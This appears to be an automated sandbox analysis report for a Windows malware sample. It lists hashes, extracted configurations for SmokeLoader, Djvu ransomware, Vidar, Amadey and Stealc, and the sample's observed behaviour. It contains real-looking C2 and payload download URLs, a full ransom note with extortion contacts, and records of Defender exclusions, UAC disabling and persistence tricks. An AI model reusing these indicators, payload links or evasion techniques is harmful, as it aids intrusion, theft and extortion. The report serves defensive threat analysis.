Analysis
max time kernel: 150s
max time network: 143s
platform: windows7_x64
resource: win7-20240215-en
resource tags: arch:x64 arch:x86 image:win7-20240215-en locale:en-us os:windows7-x64 system
submitted: 16/03/2024, 22:45
Static task: static1
Behavioral task: behavioral1
Sample: a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe
Resource: win7-20240215-en
Behavioral task: behavioral2
Sample: a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe
Resource: win10v2004-20240226-en
General
Target: a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe
Size: 223KB
MD5: 1daf51676edf7053884f8643c1a126de
SHA1: 865000f10c6395f072e9afa628a4a9b6abbd5e35
SHA256: a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669
SHA512: 199aba789dbc8962a90651cb91c89cd37c38f34282fdb9df6836803602830285a69be18dc7cbb78c2223b181a09afedd721a73993552aff313450bfde60a30b1
SSDEEP: 3072:Dxs+8iOxvXPIi/RedDfqRvPLXUC0TbML1P4kAu8TMGIn:DxsBfJXPLRedDqZU/AL1ZAuwnS
Malware Config
Extracted: smokeloader
  pub1
Extracted: smokeloader
  2022
  http://trad-einmyus.com/index.php
  http://tradein-myus.com/index.php
  http://trade-inmyus.com/index.php
Extracted: djvu
  http://sajdfue.com/test1/get.php
  extension: .vook
  offline_id: 1eSPzWRaNslCgtjBZfL5pzvovoiaVI4IZSnvAwt1
  payload_url: http://sdfjhuz.com/dl/build2.exe
  payload_url: http://sajdfue.com/files/1/build3.exe
  ransomnote:
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. Do not ask assistants from youtube and recovery data sites for help in recovering your data. They can use your free decryption quota and scam you. Our contact is emails in this text document only. You can get and look video overview decrypt tool: https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1 Price of private key and decrypt software is $999. Discount 50% available if you contact us first 72 hours, that's price for you is $499. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0857PsawqS
Extracted: vidar
  8.3
  82df9629d6ef6fc7fe54d6eb2bc6137b
  https://steamcommunity.com/profiles/76561199651834633
  https://t.me/raf6ik
  profile_id_v2: 82df9629d6ef6fc7fe54d6eb2bc6137b
  user_agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Extracted: amadey
  4.18
  http://5.42.64.44
  install_dir: 33945c4f34
  install_file: Dctooux.exe
  strings_key: c2f02f09a0f4b3b5748b3f5cd4fe9125
  url_paths: /BlsSwk93eX/index.php
Extracted: stealc
  http://185.172.128.145
  url_path: /3cd2b41cbde8fc9c.php
Signatures
DcRat 12 IoCs
DarkCrystal (DC) is a new .NET RAT active since June 2019, capable of loading additional plugins.
description | ioc | pid | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | | a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vFdRDjouJIdySq9zxNInUrO3.bat | | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yefnsn5Sesl78n0BQmatqEb2.bat | | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xS4WE8BG9R5BRBmb5Nf0l5gY.bat | | installutil.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ec623f55-8e6c-4e0f-987d-fd54a5ff2c76\\7C14.exe\" --AutoStart" | | 7C14.exe
| | 1680 | schtasks.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ft8SMkhawRJ68t6lAvElqSEC.bat | | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4xjLoCkU1xSowCzwsXH02WDz.bat | | installutil.exe
| | 2708 | schtasks.exe
| | 1360 | schtasks.exe
| | 2948 | schtasks.exe
| | 960 | schtasks.exe
Detect Vidar Stealer 5 IoCs
resource | yara_rule
behavioral1/memory/1980-110-0x0000000000400000-0x0000000000644000-memory.dmp | family_vidar_v7
behavioral1/memory/2244-112-0x00000000003A0000-0x00000000003D1000-memory.dmp | family_vidar_v7
behavioral1/memory/1980-115-0x0000000000400000-0x0000000000644000-memory.dmp | family_vidar_v7
behavioral1/memory/1980-116-0x0000000000400000-0x0000000000644000-memory.dmp | family_vidar_v7
behavioral1/memory/1980-181-0x0000000000400000-0x0000000000644000-memory.dmp | family_vidar_v7
Detected Djvu ransomware 14 IoCs
resource | yara_rule
behavioral1/memory/2752-28-0x0000000001DD0000-0x0000000001EEB000-memory.dmp | family_djvu
behavioral1/memory/760-33-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/760-36-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/760-37-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/760-60-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/1996-70-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/1996-71-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/1996-86-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/1996-87-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/1996-91-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/1996-93-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/1996-94-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/1996-117-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral1/memory/1996-130-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
Djvu Ransomware
Ransomware which is a variant of the STOP family.
Glupteba payload 6 IoCs
resource | yara_rule
behavioral1/memory/2684-689-0x0000000000400000-0x0000000000D1C000-memory.dmp | family_glupteba
behavioral1/memory/2684-693-0x0000000002B50000-0x000000000343B000-memory.dmp | family_glupteba
behavioral1/memory/2684-763-0x0000000000400000-0x0000000000D1C000-memory.dmp | family_glupteba
behavioral1/memory/2752-811-0x0000000000400000-0x0000000000D1C000-memory.dmp | family_glupteba
behavioral1/memory/2752-819-0x0000000000400000-0x0000000000D1C000-memory.dmp | family_glupteba
behavioral1/memory/1196-903-0x0000000000400000-0x0000000000D1C000-memory.dmp | family_glupteba
SmokeLoader
Modular backdoor trojan in use since 2014.
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 9091.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\jK1HRDZ3A7KLdSimVOnZ4RqI.exe = "0" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Detects binaries embedding a considerable number of MFA browser extension IDs. 2 IoCs
resource | yara_rule
behavioral1/memory/1836-833-0x0000000000710000-0x0000000000810000-memory.dmp | INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs
behavioral1/memory/1836-834-0x0000000000400000-0x000000000063B000-memory.dmp | INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs
Detects binaries embedding a considerable number of cryptocurrency wallet browser extension IDs. 2 IoCs
resource | yara_rule
behavioral1/memory/1836-833-0x0000000000710000-0x0000000000810000-memory.dmp | INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs
behavioral1/memory/1836-834-0x0000000000400000-0x000000000063B000-memory.dmp | INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs
Detects Windows executables referencing non-Windows User-Agents 5 IoCs
resource | yara_rule
behavioral1/memory/2684-689-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2684-763-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2752-811-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2752-819-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/1196-903-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 1 IoCs
resource | yara_rule
behavioral1/memory/1836-834-0x0000000000400000-0x000000000063B000-memory.dmp | INDICATOR_SUSPICIOUS_Binary_References_Browsers
Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 4 IoCs
resource | yara_rule
behavioral1/memory/1980-110-0x0000000000400000-0x0000000000644000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL
behavioral1/memory/1980-115-0x0000000000400000-0x0000000000644000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL
behavioral1/memory/1980-116-0x0000000000400000-0x0000000000644000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL
behavioral1/memory/1980-181-0x0000000000400000-0x0000000000644000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL
Detects executables (downloaders) containing URLs to raw contents of a paste 1 IoCs
resource | yara_rule
behavioral1/memory/2956-293-0x0000000000400000-0x0000000000408000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_RawPaste_URL
Detects executables containing a Discord URL, as observed in first-stage droppers 5 IoCs
resource | yara_rule
behavioral1/memory/2684-689-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/2684-763-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/2752-811-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/2752-819-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/1196-903-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_DiscordURL
Detects executables containing URLs to raw contents of a GitHub gist 5 IoCs
resource | yara_rule
behavioral1/memory/2684-689-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2684-763-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2752-811-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2752-819-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1196-903-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
Detects executables containing artifacts associated with disabling Windows Defender 5 IoCs
resource | yara_rule
behavioral1/memory/2684-689-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/2684-763-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/2752-811-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/2752-819-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/1196-903-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_DisableWinDefender
Detects executables packed with or using KoiVM 1 IoCs
resource | yara_rule
behavioral1/memory/2480-267-0x000000001A940000-0x000000001A99C000-memory.dmp | INDICATOR_EXE_Packed_KoiVM
Detects executables referencing many varying, potentially fake Windows User-Agents 5 IoCs
resource | yara_rule
behavioral1/memory/2684-689-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/2684-763-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/2752-811-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/2752-819-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/1196-903-0x0000000000400000-0x0000000000D1C000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
UPX dump on OEP (original entry point) 2 IoCs
resource | yara_rule
behavioral1/memory/1636-684-0x0000000000400000-0x0000000000930000-memory.dmp | UPX
behavioral1/memory/1636-857-0x0000000000400000-0x0000000000930000-memory.dmp | UPX
Downloads MZ/PE file
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe
Modifies Windows Firewall 2 TTPs 1 IoCs
pid | Process
2120 | netsh.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Deletes itself 1 IoCs
pid | Process
1204 | Process not Found
Drops startup file 8 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yefnsn5Sesl78n0BQmatqEb2.bat | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xS4WE8BG9R5BRBmb5Nf0l5gY.bat | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iaOQ9M3CAm8mGmeVwkJIp6Hr.bat | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skfBPwwCEgqET13E8RC7aTej.bat | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4fNjz6LB1mtmza4zo11MIPRV.bat | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vFdRDjouJIdySq9zxNInUrO3.bat | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ft8SMkhawRJ68t6lAvElqSEC.bat | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4xjLoCkU1xSowCzwsXH02WDz.bat | installutil.exe
Executes dropped EXE 29 IoCs
pid | Process
2752 | 7C14.exe
760 | 7C14.exe
2884 | 7C14.exe
1996 | 7C14.exe
2244 | build2.exe
1980 | build2.exe
1312 | D9A.exe
2740 | 21B8.exe
2480 | 9091.exe
2928 | srWVeTGyzLkwwb1QBfnCcXzi.exe
2684 | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
1876 | LyBen0R1Ao7idDzHyT9c1Fzu.exe
2336 | LyBen0R1Ao7idDzHyT9c1Fzu.tmp
1992 | pWBGIfEREWc5oWoEmV5UenVZ.exe
1836 | syncUpd.exe
1636 | BroomSetup.exe
1008 | XbHzqb0as03VeT1jmorU5VXk.exe
2928 | SIiXbH2AtpQ6J1Xgu1diXRQ5.exe
2256 | wfplwfs.exe
2752 | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
1196 | csrss.exe
1784 | Qg3s6nUq4KhkqbjIvrPmo7HO.exe
2472 | GIJECGDGCB.exe
500 | Install.exe
1764 | Install.exe
572 | patch.exe
2924 | injector.exe
2460 | windefender.exe
484 | windefender.exe
Loads dropped DLL 64 IoCs
pid Process 2752 7C14.exe 760 7C14.exe 760 7C14.exe 2884 7C14.exe 1996 7C14.exe 1996 7C14.exe 568 WerFault.exe 568 WerFault.exe 568 WerFault.exe 568 WerFault.exe 2600 WerFault.exe 2600 WerFault.exe 2600 WerFault.exe 1204 Process not Found 1204 Process not Found 2260 WerFault.exe 2260 WerFault.exe 2260 WerFault.exe 2260 WerFault.exe 2260 WerFault.exe 2956 installutil.exe 2956 installutil.exe 2956 installutil.exe 2956 installutil.exe 1876 LyBen0R1Ao7idDzHyT9c1Fzu.exe 2336 LyBen0R1Ao7idDzHyT9c1Fzu.tmp 2336 LyBen0R1Ao7idDzHyT9c1Fzu.tmp 2336 LyBen0R1Ao7idDzHyT9c1Fzu.tmp 2956 installutil.exe 1992 pWBGIfEREWc5oWoEmV5UenVZ.exe 1992 pWBGIfEREWc5oWoEmV5UenVZ.exe 1992 pWBGIfEREWc5oWoEmV5UenVZ.exe 1992 pWBGIfEREWc5oWoEmV5UenVZ.exe 1992 pWBGIfEREWc5oWoEmV5UenVZ.exe 2956 installutil.exe 2956 installutil.exe 2956 installutil.exe 2928 SIiXbH2AtpQ6J1Xgu1diXRQ5.exe 1836 syncUpd.exe 1836 syncUpd.exe 2752 jK1HRDZ3A7KLdSimVOnZ4RqI.exe 2752 jK1HRDZ3A7KLdSimVOnZ4RqI.exe 2956 installutil.exe 1784 Qg3s6nUq4KhkqbjIvrPmo7HO.exe 1784 Qg3s6nUq4KhkqbjIvrPmo7HO.exe 1784 Qg3s6nUq4KhkqbjIvrPmo7HO.exe 2880 cmd.exe 1784 Qg3s6nUq4KhkqbjIvrPmo7HO.exe 500 Install.exe 500 Install.exe 500 Install.exe 500 Install.exe 1764 Install.exe 1764 Install.exe 1764 Install.exe 860 Process not Found 572 patch.exe 572 patch.exe 572 patch.exe 572 patch.exe 572 patch.exe 1196 csrss.exe 572 patch.exe 572 patch.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid | Process
2828 | icacls.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
resource | yara_rule
behavioral1/memory/1636-684-0x0000000000400000-0x0000000000930000-memory.dmp | upx
behavioral1/memory/1636-857-0x0000000000400000-0x0000000000930000-memory.dmp | upx
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\jK1HRDZ3A7KLdSimVOnZ4RqI.exe = "0" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 4 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\GIJECGDGCB.exe" | GIJECGDGCB.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | csrss.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ec623f55-8e6c-4e0f-987d-fd54a5ff2c76\\7C14.exe\" --AutoStart" | 7C14.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 9091.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 9091.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow | ioc
55 | pastebin.com
57 | pastebin.com
70 | bitbucket.org
72 | bitbucket.org
41 | drive.google.com
42 | drive.google.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
7 | api.2ip.ua
8 | api.2ip.ua
18 | api.2ip.ua
Manipulates WinMonFS driver. 1 IoCs
Rootkits write to WinMonFS to hide directories/files from being detected.
description | ioc | Process
File opened for modification | \??\WinMonFS | csrss.exe
Modifies boot configuration data using bcdedit 1 IoCs
pid | Process
1944 | bcdedit.exe
Drops file in System32 directory 2 IoCs
description | ioc | Process
File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
Suspicious use of SetThreadContext 5 IoCs
description | pid | Process | procid_target
PID 2752 set thread context of 760 | 2752 | 7C14.exe | 32
PID 2884 set thread context of 1996 | 2884 | 7C14.exe | 36
PID 2244 set thread context of 1980 | 2244 | build2.exe | 39
PID 2480 set thread context of 2956 | 2480 | 9091.exe | 56
PID 2256 set thread context of 2796 | 2256 | wfplwfs.exe | 80
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description | ioc | Process
File opened (read-only) | \??\VBoxMiniRdrDN | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Drops file in Windows directory 8 IoCs
description | ioc | Process
File created | C:\Windows\Tasks\f3e7edc854e23b3d.job | wfplwfs.exe
File opened for modification | C:\Windows\rss | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
File created | C:\Windows\rss\csrss.exe | jK1HRDZ3A7KLdSimVOnZ4RqI.exe
File created | C:\Windows\Logs\CBS\CbsPersist_20240316224738.cab | makecab.exe
File created | C:\Windows\windefender.exe | csrss.exe
File opened for modification | C:\Windows\windefender.exe | csrss.exe
File created | C:\Windows\Tasks\bVJltUxuNruTzSXcXP.job | schtasks.exe
File created | C:\Windows\Tasks\Dctooux.job | srWVeTGyzLkwwb1QBfnCcXzi.exe
Launches sc.exe 1 IoCs
sc.exe is a Windows utility to control services on the system.
pid | Process
2712 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 2 IoCs
pid | pid_target | Process | procid_target
568 | 1980 | WerFault.exe | 39
2600 | 1312 | WerFault.exe | 45
NSIS installer 1 IoCs
resource | yara_rule
behavioral1/files/0x0006000000016d32-572.dat | nsis_installer_2
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | syncUpd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | syncUpd.exe
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1680 | schtasks.exe
2708 | schtasks.exe
1360 | schtasks.exe
2948 | schtasks.exe
960 | schtasks.exe
Enumerates system info in registry 2 TTPs 2 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main | rundll32.exe
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) 